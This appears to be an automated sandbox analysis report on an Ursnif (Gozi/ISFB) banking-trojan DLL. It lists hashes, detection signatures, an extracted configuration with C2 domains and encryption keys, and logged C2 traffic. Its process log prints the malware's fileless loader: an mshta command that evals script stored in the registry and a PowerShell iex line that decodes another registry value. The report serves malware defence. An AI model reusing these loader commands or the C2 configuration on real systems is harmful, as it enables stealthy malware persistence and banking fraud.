Windows Analysis Report lj3H69Z3Io.dll

Overview

General Information

Sample Name: lj3H69Z3Io.dll
Analysis ID: 447090
MD5: 0bb29556ece1c51c751cb4e7c8752ddc
SHA1: 324cc356a56c68e51f09348e91405001e68e4a08
SHA256: af1b052362469a67fcd871558b24efa2be44a4b29f88112e5c2d2295a1dc4252
Tags: dllGoziISFBUrsnif
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Encoded IEX
Yara detected Ursnif
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Mshta Spawning Windows Shell
Suspicious powershell command line found
Writes registry values via WMI
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000003.00000003.351054723.00000000027A0000.00000040.00000001.sdmp Malware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "RS1bISYM3RiUEB+kp8sXk6GKaUSJTMdHLJSpyFRYeZm6NlcBwtjx2F3paluhib1HCWprL2CGUSXu41FZM2nRjuIHp5Tc3Qvf1bHq8axt1kKB98ZnmfPh2SiQVpHGVA+TOuAe97sVP0cE6xXX2ilAxOJC4Rf34gUi3XolV8kPrfJCHChbu9w1+s7rrVZTOVjBW+TY1D3deVJlDZHvhlBuumQis3pP1XsoLa3Qay006/AhbN9RIoAAij7c7SagXOd4BXA8L9GZCI5rXohvITy2kTk5pHs5LCiTFpT9Pohv1JBotMkOGx7WyBP+G1Cbx4yBjRbbIosmagFN4Hgw4QhKyFdWlAfAWJCgEYrSkeFoNBM=", "c2_domain": ["gtr.antoinfer.com", "app.bighomegl.at"], "botnet": "2500", "server": "580", "serpent_key": "B43ovnLWYCtQUCWU", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "10"}
Multi AV Scanner detection for domain / URL
Source: gtr.antoinfer.com Virustotal: Detection: 7% Perma Link
Multi AV Scanner detection for submitted file
Source: lj3H69Z3Io.dll Virustotal: Detection: 41% Perma Link
Source: lj3H69Z3Io.dll ReversingLabs: Detection: 31%

Compliance:

barindex
Uses 32bit PE files
Source: lj3H69Z3Io.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll Jump to behavior
Source: lj3H69Z3Io.dll Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: sfc_os.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
Source: Binary string: shcore.pdb source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp
Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
Source: Binary string: fltLib.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: advapi32.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: rundll32.pdbk source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: shell32.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
Source: Binary string: wsspicli.pdb5 source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: propsys.pdb- source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: wimm32.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
Source: Binary string: mpr.pdb source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp
Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: cryptbase.pdb; source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: Bed.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
Source: Binary string: setupapi.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: imagehlp.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: upwntdll.pdb source: WerFault.exe, 00000014.00000002.436609525.0000000004DF9000.00000004.00000001.sdmp
Source: Binary string: winspool.pdb! source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: shcore.pdbk source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp
Source: Binary string: profapi.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: winspool.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
Source: Binary string: sechost.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: propsys.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp
Source: Binary string: c:\201\Their\Quart-Sheet\497_who\Bed.pdb source: rundll32.exe, 00000002.00000002.444299096.000000006E191000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.616072901.000000006E191000.00000002.00020000.sdmp, WerFault.exe, 00000014.00000003.411602089.0000000004DE1000.00000004.00000001.sdmp, lj3H69Z3Io.dll
Source: Binary string: powrprof.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: netapi32.pdbD source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: ole32.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: AcLayers.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp
Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: netapi32.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp
Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp
Source: Binary string: combase.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp
Source: Binary string: rundll32.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
Source: Binary string: wtsapi32.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: iphlpapi.pdb' source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: sfc_os.pdbS source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: sfc.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: apphelp.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
Source: Binary string: wuser32.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdbk source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
Source: Binary string: c:\201\Their\Quart-Sheet\497_who\Bed.pdbbj source: WerFault.exe, 00000014.00000003.412073889.0000000004DB5000.00000004.00000001.sdmp
Source: Binary string: netutils.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: Nc:\201\Their\Quart-Sheet\497_who\Bed.pdb source: WerFault.exe, 00000014.00000003.411494273.0000000004E04000.00000004.00000001.sdmp
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_6E188626 FindFirstFileExA, 2_2_6E188626

Networking:

barindex
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
Source: global traffic HTTP traffic detected: GET /4khtvsQ0u/_2Bibxls4V27IXxwFbLo/MVAeZiN_2BcOXrnrV8V/qJdJNxZ6Bgv5NEeycuU5RT/xP63sFYeQbF7V/py7Hi7cb/9YfAdWQtdGthxteTogc4W5n/e4pHdJmwQV/Xb_2ByBc4q7LehmCP/qbPYu2dVkV6R/HcylsChDiT2/MxSzZGJm_2F7kQ/SwyqdbxYkDgH_2FqkftiZ/sgfsFtj_2BtQQ2R6/R1qw5igRxvImwz6/pMeyM_2FrLNrloESyl/5_2BeunOI/9zlfRQun7lnhbsKL_2FH/F_2B8nMOma_2F2fjvu5/bI8nw1gkOTg_2F0CTqoQIr/cSQsg2LKmpe1I/kDimvPNH/SgPLk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: gtr.antoinfer.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: gtr.antoinfer.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Pl9Eori10/TWROVDxUXG0e5P8cvyge/ZU2BrrTT9UbiVqqjDG4/pcVLHkjQ_2FTIEKMeI9p0c/uvvfHn2PMXNEy/YMBxD3SD/aXgaxQm1VvX_2F13h2xPwK_/2Be7i5l50E/A7ENFq4ZupT65ephY/chqySvAke9ce/Kevf8ZZImEj/1Va42IfLQ3XJd9/R1lLLjkYwIWCsGvDlqysG/bJCIxC_2Ba_2FKBG/1sCib9KWGT9006o/pVIAR6x7f8e8pX6JMX/r5dwKRidW/K11bWM2mJHwpxkeOpFZf/WuqCfL3c8woO2jHlv7x/oi4kjIDfCy176FSPyJZhM9/EN_2FkQv43sxx/a HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: gtr.antoinfer.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: gtr.antoinfer.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /M70Tzsw1MNAdF/xfm5A_2F/icgFe0hTlDYi8x1LZCDgadb/p8hAogRvpL/JEjshnYytb_2FaVCd/bp1e8aV2PI_2/FY5oP4oo0f6/GeARX2_2FlA_2F/2BhurwBe_2BrsQ1B1bUK7/wilinEmmYIdaZ6lz/71Mw33QzoCtr9s9/ULFilVIFcIxUDJIsEo/crrSiFkaK/6sQSCYti3ETwug18IBlk/b94MQVqQ698rgMibrOo/RMBVkg8AFrK4uT2Dq6pO06/OdceZPFn8QQWz/SARUSfJd/dirYBJB3Uuu4IivFAYs9FmV/Pmcsy6YvBv/Lcgiqf1bUTKnYCeNL/dikDMv66Bty/6H HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: gtr.antoinfer.comConnection: Keep-Alive
Source: unknown DNS traffic detected: queries for: gtr.antoinfer.com
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 12 Jul 2021 09:50:36 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
Source: powershell.exe, 0000002A.00000002.626923996.00000273E0C30000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: {08A52032-E342-11EB-90E4-ECF4BB862DED}.dat.32.dr, ~DFBCEA36BA3DC5EC74.TMP.32.dr String found in binary or memory: http://gtr.antoinfer.com/4khtvsQ0u/_2Bibxls4V27IXxwFbLo/MVAeZiN_2BcOXrnrV8V/qJdJNxZ6Bgv5NEeycuU5RT/x
Source: rundll32.exe, 00000003.00000002.610195146.0000000002CD0000.00000002.00000001.sdmp, powershell.exe, 0000002A.00000002.609722055.00000273C7180000.00000002.00000001.sdmp String found in binary or memory: http://gtr.antoinfer.com/M70Tzsw1MNAdF/xfm5A_2F/icgFe0hTlDYi8x1LZCDgadb/p8hAogRvpL/JEjshnYytb_2
Source: {08A52036-E342-11EB-90E4-ECF4BB862DED}.dat.32.dr String found in binary or memory: http://gtr.antoinfer.com/M70Tzsw1MNAdF/xfm5A_2F/icgFe0hTlDYi8x1LZCDgadb/p8hAogRvpL/JEjshnYytb_2FaVCd
Source: {08A52034-E342-11EB-90E4-ECF4BB862DED}.dat.32.dr, ~DF5A692A62F2D75F35.TMP.32.dr String found in binary or memory: http://gtr.antoinfer.com/Pl9Eori10/TWROVDxUXG0e5P8cvyge/ZU2BrrTT9UbiVqqjDG4/pcVLHkjQ_2FTIEKMeI9p0c/u
Source: powershell.exe, 0000002A.00000002.622133874.00000273D895C000.00000004.00000001.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000002A.00000002.612577648.00000273C8AFF000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000002A.00000002.610882160.00000273C88F1000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000002A.00000002.612577648.00000273C8AFF000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000002A.00000002.622133874.00000273D895C000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000002A.00000002.622133874.00000273D895C000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000002A.00000002.622133874.00000273D895C000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000002A.00000002.612577648.00000273C8AFF000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000002A.00000002.622133874.00000273D895C000.00000004.00000001.sdmp String found in binary or memory: https://nuget.org/nuget.exe

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Yara detected Ursnif
Source: Yara match File source: 3.3.rundll32.exe.4f594a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000003.556259843.0000000004DDC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.537141120.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.537104299.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.536940847.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.548180639.0000000004F59000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.537188735.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.537165510.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.537047715.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.536909133.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.536969040.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY

E-Banking Fraud:

barindex
Yara detected Ursnif
Source: Yara match File source: 3.3.rundll32.exe.4f594a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000003.556259843.0000000004DDC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.537141120.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.537104299.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.536940847.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.548180639.0000000004F59000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.537188735.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.537165510.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.537047715.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.536909133.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.536969040.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY

System Summary:

barindex
Writes registry values via WMI
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E141B9C GetProcAddress,NtCreateSection,memset, 3_2_6E141B9C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E141EC7 NtMapViewOfSection, 3_2_6E141EC7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E142485 NtQueryVirtualMemory, 3_2_6E142485
Detected potential crypto function
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_6E167CA0 2_2_6E167CA0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_6E16B840 2_2_6E16B840
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_6E1796BD 2_2_6E1796BD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_6E17CEC0 2_2_6E17CEC0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_6E17FF3F 2_2_6E17FF3F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_6E175FDD 2_2_6E175FDD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_6E186CF9 2_2_6E186CF9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_6E189B9C 2_2_6E189B9C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E142264 3_2_6E142264
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E16B840 3_2_6E16B840
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E1796BD 3_2_6E1796BD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E17CEC0 3_2_6E17CEC0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E17FF3F 3_2_6E17FF3F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E175FDD 3_2_6E175FDD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 42_2_00007FFAEEA1056F 42_2_00007FFAEEA1056F
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 6E174A80 appears 67 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 6E17B4B4 appears 34 times
One or more processes crash
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 648
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE Jump to behavior
Uses 32bit PE files
Source: lj3H69Z3Io.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: classification engine Classification label: mal96.troj.evad.winDLL@26/21@3/1
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3416
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5064:120:WilError_01
Source: C:\Windows\SysWOW64\WerFault.exe File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER2A24.tmp Jump to behavior
Source: lj3H69Z3Io.dll Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Program Files\internet explorer\iexplore.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\lj3H69Z3Io.dll,Busysection
Source: lj3H69Z3Io.dll Virustotal: Detection: 41%
Source: lj3H69Z3Io.dll ReversingLabs: Detection: 31%
Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\lj3H69Z3Io.dll'
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\lj3H69Z3Io.dll',#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\lj3H69Z3Io.dll,Busysection
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\lj3H69Z3Io.dll',#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\lj3H69Z3Io.dll,Dealthis
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\lj3H69Z3Io.dll,Sing
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\lj3H69Z3Io.dll,Teethshould
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 648
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 656
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:996 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:996 CREDAT:82950 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:996 CREDAT:17430 /prefetch:2
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Ff7t='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ff7t).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
